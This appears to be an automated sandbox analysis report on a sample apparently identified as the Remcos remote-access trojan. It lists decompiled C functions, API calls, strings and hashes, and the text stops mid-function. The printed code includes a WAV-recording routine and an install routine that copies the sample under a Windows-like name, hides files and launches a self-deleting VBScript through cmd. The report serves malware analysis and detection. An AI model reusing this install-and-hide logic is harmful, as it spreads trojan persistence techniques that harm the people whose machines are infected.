					WriteFile(_t81,  &_v12, 4,  &_v8, 0);
					WriteFile(_t81, "WAVE", 4,  &_v8, 0);
					WriteFile(_t81, "fmt ", 4,  &_v8, 0);
					WriteFile(_t81,  &_v16, 4,  &_v8, 0);
					WriteFile(_t81,  &_v20, 2,  &_v8, 0);
					WriteFile(_t81, 0x46ba9a, 2,  &_v8, 0);
					WriteFile(_t81, 0x46ba9c, 4,  &_v8, 0);
					WriteFile(_t81,  &_v24, 4,  &_v8, 0);
					WriteFile(_t81,  &_v28, 2,  &_v8, 0);
					WriteFile(_t81, 0x46baa6, 2,  &_v8, 0);
					WriteFile(_t81, "data", 4,  &_v8, 0);
					WriteFile(_t81,  &_v32, 4,  &_v8, 0);
					WriteFile(_t81,  *_t75, _t75[1],  &_v8, 0);
					CloseHandle(_t81);
					return 1;
				}
				return 0;
			}

0x00401a73
0x00401a76
0x00401a7d
0x00401a80
0x00401a87
0x00401a9a
0x00401a9f
0x00401ab0
0x00401ab8
0x00401ac3
0x00401ac9
0x00401ad2
0x00401ad7
0x00401af3
0x00401b02
0x00401b12
0x00401b22
0x00401b31
0x00401b40
0x00401b50
0x00401b60
0x00401b6f
0x00401b7e
0x00401b8e
0x00401b9e
0x00401bad
0x00401bbb
0x00401bbe
0x00000000
0x00401bc4
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401ACC
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AF3
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B02
WriteFile.KERNEL32(00000000,WAVE,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B12
WriteFile.KERNEL32(00000000,fmt ,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B22
WriteFile.KERNEL32(00000000,00000010,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B31
WriteFile.KERNEL32(00000000,00000001,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B40
WriteFile.KERNEL32(00000000,0046BA9A,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B50
WriteFile.KERNEL32(00000000,0046BA9C,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B60
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B6F
WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B7E
WriteFile.KERNEL32(00000000,0046BAA6,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B8E
WriteFile.KERNEL32(00000000,data,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B9E
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401BAD

Strings

fmt , xrefs: 00401B1C
data, xrefs: 00401B98
WAVE, xrefs: 00401B0C
RIFF, xrefs: 00401AED

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: b88aaf6fd4ae18e9db3e7edb62172b1f03b106a838d8e35c764a4ab3da7406ab
Instruction ID: 7cb0b37bd81af4d905286dd476bd08579b6e0b57ecfaa18f48c35616be89f383
Opcode Fuzzy Hash: b88aaf6fd4ae18e9db3e7edb62172b1f03b106a838d8e35c764a4ab3da7406ab
Instruction Fuzzy Hash: DE413DB1A50218BAE710DA918C86FFFBBBCDB45B50F500066FB04EA0C0D7B45A05DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040A987, Relevance: 33.6, APIs: 7, Strings: 12, Instructions: 324
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040A987(char __ecx, intOrPtr* __edx, WCHAR* _a4, char _a8, char _a12) {
				char _v9;
				int _v20;
				char _v44;
				char _v68;
				char _v92;
				char _v116;
				char _v140;
				char _v164;
				char _v188;
				char _v212;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				void* _t63;
				signed int _t67;
				signed int _t68;
				int _t70;
				void* _t79;
				void* _t91;
				void* _t92;
				int _t94;
				void* _t99;
				void* _t100;
				WCHAR* _t113;
				int _t115;
				intOrPtr _t118;
				WCHAR* _t123;
				int _t124;
				void* _t139;
				intOrPtr* _t152;
				int _t153;
				intOrPtr* _t207;
				int _t208;
				intOrPtr* _t235;
				void* _t236;
				void* _t239;
				void* _t249;
				void* _t250;
				intOrPtr _t254;
				void* _t257;
				void* _t259;
				intOrPtr* _t260;

				_t235 = __edx;
				_v9 = __ecx;
				_t260 = __edx;
				_v20 = 0;
				_t257 = __edx + 2;
				do {
					_t62 =  *_t235;
					_t235 = _t235 + 2;
				} while (_t62 != 0);
				_t236 = _t235 - _t257;
				_t268 = _t236;
				if(_t236 == 0) {
					_t143 = _a4;
					_t238 = __ecx;
					_t63 = E0041805B( &_v92, __ecx, _t143);
					_t259 = 0x46c500;
					E00401EFA(0x46c500, _t238, _t260, _t63);
				} else {
					CreateDirectoryW(E00401EEB(0x46c530), 0);
					_t143 = _a4;
					_t139 = E004030A6(_t143,  &_v92, E00407514( &_v44, 0x46c530, _t268, "\\"), 0x46c530, _t268, _t143);
					_t259 = 0x46c500;
					E00401EFA(0x46c500, _t138, _t260, _t139);
					E00401EF0();
				}
				E00401EF0();
				_t152 = E00401EEB(_t259);
				_t67 = 0x46bb08;
				while(1) {
					_t239 =  *_t67;
					if(_t239 !=  *_t152) {
						break;
					}
					if(_t239 == 0) {
						L10:
						_t153 = 0;
						_t68 = 0;
						L12:
						if(_t68 != 0) {
							_t70 = CopyFileW("C:\Windows\SysWOW64\DpiScaling.exe", E00401EEB(_t259), _t153);
							__eflags = _t70;
							if(_t70 != 0) {
								L23:
								E0040A896(0x46c4e8, E00401EEB(0x46c4e8));
								__eflags = _a8 - 1;
								_pop(_t157);
								if(__eflags != 0) {
									L28:
									E004030A6(_t143,  &_v92, E0040427F(_t143,  &_v68, E0043987F(_t143, _t157, __eflags, L"Temp")), _t259, __eflags, L"\\install.vbs");
									E00401EF0();
									E0040427F(_t143,  &_v44, L"WScript.Sleep 1000\n");
									E0040766C(_t143,  &_v44, _t259, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
									__eflags = _a12 - 1;
									_t144 = "\n";
									if(__eflags == 0) {
										_t100 = E0040427F("\n",  &_v212, "C:\Windows\SysWOW64\DpiScaling.exe");
										E00403311(E004030A6(_t144,  &_v68, E004030A6(_t144,  &_v116, E00403030( &_v140, E004030A6(_t144,  &_v164, E0040427F("\n",  &_v188, L"fso.DeleteFile "), _t259, __eflags, "\""), _t100), _t259, __eflags, "\""), _t259, __eflags, _t144));
										E00401EF0();
										E00401EF0();
										E00401EF0();
										E00401EF0();
										E00401EF0();
										E00401EF0();
									}
									_t79 = E0040427F(_t144,  &_v116, L"\"\"\", 0");
									E00403311(E004030A6(_t144,  &_v212, E00403030( &_v188, E00404429(_t144,  &_v164, E0040427F(_t144,  &_v68, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), __eflags, _t259), _t79), _t259, __eflags, _t144));
									E00401EF0();
									E00401EF0();
									E00401EF0();
									E00401EF0();
									E00401EF0();
									E0040766C(_t144,  &_v44, _t259, L"fso.DeleteFile(Wscript.ScriptFullName)");
									_t91 = E00401EEB( &_v92);
									_t92 = E00402489();
									_t94 = E00417947(E00401EEB( &_v44), _t92 + _t92, _t91, 0);
									__eflags = _t94;
									if(_t94 == 0) {
										L33:
										E00401EF0();
										return E00401EF0();
									} else {
										_t99 = ShellExecuteW(0, L"open", E00401EEB( &_v92), 0x45f724, 0x45f724, 0);
										__eflags = _t99 - 0x20;
										if(_t99 <= 0x20) {
											goto L33;
										}
										ExitProcess(0);
									}
								}
								_t113 = E00401EEB(_t259);
								_t143 = SetFileAttributesW;
								SetFileAttributesW(_t113, 7);
								_t249 = _t260 + 2;
								_t157 = 0;
								__eflags = 0;
								do {
									_t115 =  *_t260;
									_t260 = _t260 + 2;
									__eflags = _t115;
								} while (_t115 != 0);
								__eflags = _t260 - _t249;
								if(__eflags != 0) {
									_t157 = 0x46c530;
									SetFileAttributesW(E00401EEB(0x46c530), 7);
								}
								goto L28;
							}
							__eflags = _v9 - 0x36;
							if(_v9 == 0x36) {
								goto L23;
							}
							_t207 = _t260;
							_t250 = _t207 + 2;
							do {
								_t118 =  *_t207;
								_t207 = _t207 + 2;
								__eflags = _t118 - _v20;
							} while (_t118 != _v20);
							_t208 = _t207 - _t250;
							__eflags = _t208;
							_push(_t143);
							if(_t208 == 0) {
								E00401EFA(_t259, 0x36, _t260, E0041805B( &_v68, 0x36));
							} else {
								E00401EFA(_t259, _t128, _t260, E004030A6(_t143,  &_v140, E004030A6(_t143,  &_v116, E0041805B( &_v68, 0x36, _t260), _t259, __eflags, "\\"), _t259, __eflags));
								E00401EF0();
								E00401EF0();
							}
							E00401EF0();
							_t123 = E00401EEB(_t259);
							_t143 = 0x46bb08;
							_t124 = CopyFileW(0x46bb08, _t123, 0);
							__eflags = _t124;
							if(_t124 != 0) {
								goto L23;
							} else {
								E00409DC9(0x46bb08, _t259, 0x46bb08);
								return 0;
							}
						}
						E0040A896(0x46c4e8, E00401EEB(0x46c4e8));
						return 1;
					}
					_t254 =  *((intOrPtr*)(_t67 + 2));
					if(_t254 !=  *((intOrPtr*)(_t152 + 2))) {
						break;
					}
					_t67 = _t67 + 4;
					_t152 = _t152 + 4;
					if(_t254 != 0) {
						continue;
					}
					goto L10;
				}
				asm("sbb eax, eax");
				_t68 = _t67 | 0x00000001;
				_t153 = 0;
				__eflags = 0;
				goto L12;
			}

0x0040a987
0x0040a994
0x0040a998
0x0040a99a
0x0040a99d
0x0040a9a0
0x0040a9a0
0x0040a9a3
0x0040a9a6
0x0040a9ab
0x0040a9ab
0x0040a9b4
0x0040a9fe
0x0040aa01
0x0040aa07
0x0040aa0d
0x0040aa15
0x0040a9b6
0x0040a9bf
0x0040a9c5
0x0040a9de
0x0040a9e4
0x0040a9ec
0x0040a9f4
0x0040a9f9
0x0040aa1d
0x0040aa29
0x0040aa2b
0x0040aa30
0x0040aa30
0x0040aa36
0x00000000
0x00000000
0x0040aa3b
0x0040aa52
0x0040aa52
0x0040aa54
0x0040aa5f
0x0040aa61
0x0040aa8b
0x0040aa91
0x0040aa93
0x0040ab42
0x0040ab4e
0x0040ab53
0x0040ab58
0x0040ab59
0x0040ab92
0x0040abb0
0x0040abb9
0x0040abc6
0x0040abd3
0x0040abd8
0x0040abdc
0x0040abe1
0x0040abf9
0x0040ac46
0x0040ac4e
0x0040ac56
0x0040ac61
0x0040ac6c
0x0040ac77
0x0040ac82
0x0040ac82
0x0040ac90
0x0040acd2
0x0040acdd
0x0040ace8
0x0040acf3
0x0040acfb
0x0040ad03
0x0040ad10
0x0040ad1b
0x0040ad24
0x0040ad39
0x0040ad40
0x0040ad42
0x0040ad6d
0x0040ad70
0x00000000
0x0040ad44
0x0040ad5b
0x0040ad61
0x0040ad64
0x00000000
0x00000000
0x0040ad67
0x0040ad67
0x0040ad42
0x0040ab5f
0x0040ab64
0x0040ab6b
0x0040ab6d
0x0040ab70
0x0040ab70
0x0040ab72
0x0040ab72
0x0040ab75
0x0040ab78
0x0040ab78
0x0040ab7d
0x0040ab81
0x0040ab85
0x0040ab90
0x0040ab90
0x00000000
0x0040ab81
0x0040aa99
0x0040aa9d
0x00000000
0x00000000
0x0040aaa3
0x0040aaa5
0x0040aaa8
0x0040aaa8
0x0040aaab
0x0040aaae
0x0040aaae
0x0040aab4
0x0040aab4
0x0040aaba
0x0040aabe
0x0040ab0b
0x0040aac0
0x0040aae8
0x0040aaf3
0x0040aafb
0x0040aafb
0x0040ab13
0x0040ab1d
0x0040ab23
0x0040ab29
0x0040ab2f
0x0040ab31
0x00000000
0x0040ab33
0x0040ab36
0x00000000
0x0040ab3b
0x0040ab31
0x0040aa6f
0x00000000
0x0040aa76
0x0040aa3d
0x0040aa45
0x00000000
0x00000000
0x0040aa47
0x0040aa4a
0x0040aa50
0x00000000
0x00000000
0x00000000
0x0040aa50
0x0040aa58
0x0040aa5a
0x0040aa5d
0x0040aa5d
0x00000000

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A9BF
CopyFileW.KERNEL32(C:\Windows\SysWOW64\DpiScaling.exe,00000000,00000000,00000000), ref: 0040AA8B
CopyFileW.KERNEL32(C:\Windows\SysWOW64\DpiScaling.exe,00000000,00000000,00000000), ref: 0040AB29

Part of subcall function 0041805B: GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 004181B2

SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040AB6B
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040AB90
ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040AD5B
ExitProcess.KERNEL32 ref: 0040AD67

Strings

6, xrefs: 0040AA99
open, xrefs: 0040AD55
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040ABCB
C:\Windows\SysWOW64\DpiScaling.exe, xrefs: 0040AA2B, 0040AA86, 0040AB23, 0040AB28, 0040AB33, 0040ABF4
""", 0, xrefs: 0040AC88
\install.vbs, xrefs: 0040AB92
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040AC97
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040AD08
fso.DeleteFile , xrefs: 0040AC00
Remcos, xrefs: 0040AA63, 0040AB42
WScript.Sleep 1000, xrefs: 0040ABBE
Temp, xrefs: 0040AB97

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$AttributesCopy$CreateDirectoryExecuteExitLongNamePathProcessShell
String ID: """, 0$6$C:\Windows\SysWOW64\DpiScaling.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
API String ID: 4018752923-2578384121
Opcode ID: f06eaad87278a9b20e184628e2dc9dad4c598378312cbd5f85f7dc0a88970244
Instruction ID: 190cd27c0b7bf58ebe4b0d8389cb7e98ba8e890002f8b4040f3ff986190cfdad
Opcode Fuzzy Hash: f06eaad87278a9b20e184628e2dc9dad4c598378312cbd5f85f7dc0a88970244
Instruction Fuzzy Hash: C4A1637160020456CB28FBA5DC92AFF737AAF54344F54407FF806B61D2EE386E46C66A

Uniqueness

Uniqueness Score: -1.00%

Function 004476AD, Relevance: 27.4, APIs: 18, Instructions: 419
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004476AD(signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int* _t292;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				signed int _t302;
				signed int _t303;
				WCHAR* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t307;
				signed int _t308;
				signed int _t310;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;

				_t217 = _a4;
				if(_t217 != 0) {
					_t286 = _t217;
					_t116 = E00434F60(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t285;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(E0043A504())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t298 =  *0x46b4d0; // 0x2fba800
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t298 -  *0x46b4dc; // 0x2fba800
							if(__eflags == 0) {
								L87();
								_t298 = _t120;
								_t120 = _v5;
								_t231 = _t298;
								 *0x46b4d0 = _t298;
							}
							_t218 = 0;
							__eflags = _t298;
							if(_t298 != 0) {
								L21:
								_t233 = _t286;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t299 = E00447D55(_t298);
												E004401F5(_t218);
												_t320 = _t320 + 0x10;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t286 = _t218;
													_t126 = _a4;
													 *(_t299 + _t237 * 4) = _t126;
													 *(_t299 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t298 - _t218;
									if( *_t298 == _t218) {
										goto L29;
									} else {
										E004401F5( *((intOrPtr*)(_t298 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t298 + _t282 * 4) - _t218;
												if( *(_t298 + _t282 * 4) == _t218) {
													break;
												}
												_t19 = _t282 * 4; // 0x2fbfc48
												 *(_t298 + _t282 * 4) =  *(_t298 + _t19 + 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t299 = E00447D55(_t298);
											E004401F5(_t218);
											_t320 = _t320 + 0x10;
											_t126 = _t286;
											__eflags = _t299;
											if(_t299 != 0) {
												L34:
												 *0x46b4d0 = _t299;
											}
										} else {
											_t126 = _a4;
											_t286 = _t218;
											 *(_t298 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t283 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t283 + 2;
											_t300 = E0043F348(_t238 - _t283, _t238 - _t283 + 2, 1);
											_pop(_t241);
											__eflags = _t300;
											if(_t300 == 0) {
												L42:
												E004401F5(_t300);
												goto L12;
											} else {
												_t131 = E00441916(_t300, _v12, _a4);
												_t321 = _t320 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E0043698A();
													asm("int3");
													_t316 = _t321;
													_t322 = _t321 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t300);
														_push(_t286);
														_push(0x3d);
														_t288 = _t220;
														_t133 = E00450FF7(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(E0043A504())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t302 =  *0x46b4d4; // 0x2fce800
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t302 -  *0x46b4d8; // 0x2fced80
																if(__eflags == 0) {
																	_push(_t302);
																	L104();
																	_t246 = _v9;
																	_t302 = _t133;
																	 *0x46b4d4 = _t302;
																}
																__eflags = _t302;
																if(_t302 != 0) {
																	L64:
																	_v20 = _v20 - _t288 >> 1;
																	_t138 = E00447CE8(_t288, _v20 - _t288 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t303 = E00447D55(_t302);
																					E004401F5(_t221);
																					_t322 = _t322 + 0x10;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t288 = _t221;
																						_t142 = _v0;
																						 *(_t303 + _t253 * 4) = _t142;
																						 *(_t303 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t302 - _t221;
																		if( *_t302 == _t221) {
																			goto L72;
																		} else {
																			E004401F5( *((intOrPtr*)(_t302 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t302 + _t276 * 4) - _t221;
																					if( *(_t302 + _t276 * 4) == _t221) {
																						break;
																					}
																					_t64 = _t276 * 4; // 0x2fca5e8
																					 *(_t302 + _t276 * 4) =  *(_t302 + _t64 + 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t303 = E00447D55(_t302);
																				E004401F5(_t221);
																				_t322 = _t322 + 0x10;
																				_t142 = _t288;
																				__eflags = _t303;
																				if(_t303 != 0) {
																					L77:
																					 *0x46b4d4 = _t303;
																				}
																			} else {
																				_t142 = _v0;
																				_t288 = _t221;
																				 *(_t302 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t284 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t304 = E0043F348(_t254 - _t284 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t304;
																				if(_t304 == 0) {
																					L85:
																					E004401F5(_t304);
																					goto L56;
																				} else {
																					_t148 = E004415D4(_t304, _v16, _v0);
																					_t323 = _t322 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E0043698A();
																						asm("int3");
																						_push(_t316);
																						_t317 = _t323;
																						_push(_t288);
																						_t290 = _v92;
																						__eflags = _t290;
																						if(_t290 != 0) {
																							_t260 = 0;
																							_t150 = _t290;
																							__eflags =  *_t290;
																							if( *_t290 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t93 = _t260 + 1; // 0x2
																							_t305 = E0043F348(_t260, _t93, 4);
																							_t262 = _t304;
																							__eflags = _t305;
																							if(_t305 == 0) {
																								L102:
																								E0043F949(_t221, _t284, _t290, _t305);
																								goto L103;
																							} else {
																								__eflags =  *_t290;
																								if( *_t290 == 0) {
																									L100:
																									E004401F5(0);
																									_t175 = _t305;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t305 - _t290;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t290;
																										_t94 = _t271 + 1; // 0x5
																										_t284 = _t94;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t284;
																										_t95 = _t262 + 1; // 0x6
																										_v16 = _t95;
																										 *(_t221 + _t290) = E0043F348(_t262, _t95, 1);
																										E004401F5(0);
																										_t323 = _t323 + 0xc;
																										__eflags =  *(_t221 + _t290);
																										if( *(_t221 + _t290) == 0) {
																											goto L102;
																										} else {
																											_t180 = E00441916( *(_t221 + _t290), _v16,  *_t290);
																											_t323 = _t323 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E0043698A();
																												asm("int3");
																												_push(_t317);
																												_t318 = _t323;
																												_push(_t262);
																												_push(_t262);
																												_push(_t290);
																												_t291 = _v128;
																												__eflags = _t291;
																												if(_t291 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t291;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t305);
																													__eflags =  *_t291;
																													if( *_t291 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t104 = _t263 + 1; // 0x2
																													_t306 = E0043F348(_t263, _t104, 4);
																													__eflags = _t306;
																													if(_t306 == 0) {
																														L119:
																														E0043F949(_t223, _t284, _t291, _t306);
																														goto L120;
																													} else {
																														__eflags =  *_t291 - _t223;
																														if( *_t291 == _t223) {
																															L117:
																															E004401F5(_t223);
																															_t167 = _t306;
																															goto L118;
																														} else {
																															_t223 = _t306 - _t291;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t291;
																																_t105 = _t267 + 2; // 0x6
																																_t284 = _t105;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
																																_v24 = _t107;
																																 *(_t223 + _t291) = E0043F348(_t267 - _t284 >> 1, _t107, 2);
																																E004401F5(0);
																																_t323 = _t323 + 0xc;
																																__eflags =  *(_t223 + _t291);
																																if( *(_t223 + _t291) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E004415D4( *(_t223 + _t291), _v24,  *_t291);
																																	_t323 = _t323 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E0043698A();
																																		asm("int3");
																																		_push(_t318);
																																		_push(_t223);
																																		_push(_t306);
																																		_push(_t291);
																																		_t292 =  *0x46b4d0; // 0x2fba800
																																		_t307 = _t292;
																																		__eflags =  *_t292;
																																		if( *_t292 == 0) {
																																			L127:
																																			_t308 = _t307 - _t292;
																																			__eflags = _t308;
																																			_t310 =  ~(_t308 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E004444C3(_v12,  *_t307, _t225);
																																				_t323 = _t323 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t310 = _t307 - _t292 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t307 =  &(_t307[1]);
																																				__eflags =  *_t307;
																																			} while ( *_t307 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t310;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t291 = _t291 + 4;
																																__eflags =  *_t291 - _t173;
																															} while ( *_t291 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t290 = _t290 + 4;
																										__eflags =  *_t290 - _t180;
																									} while ( *_t290 != _t180);
																									goto L100;
																								}
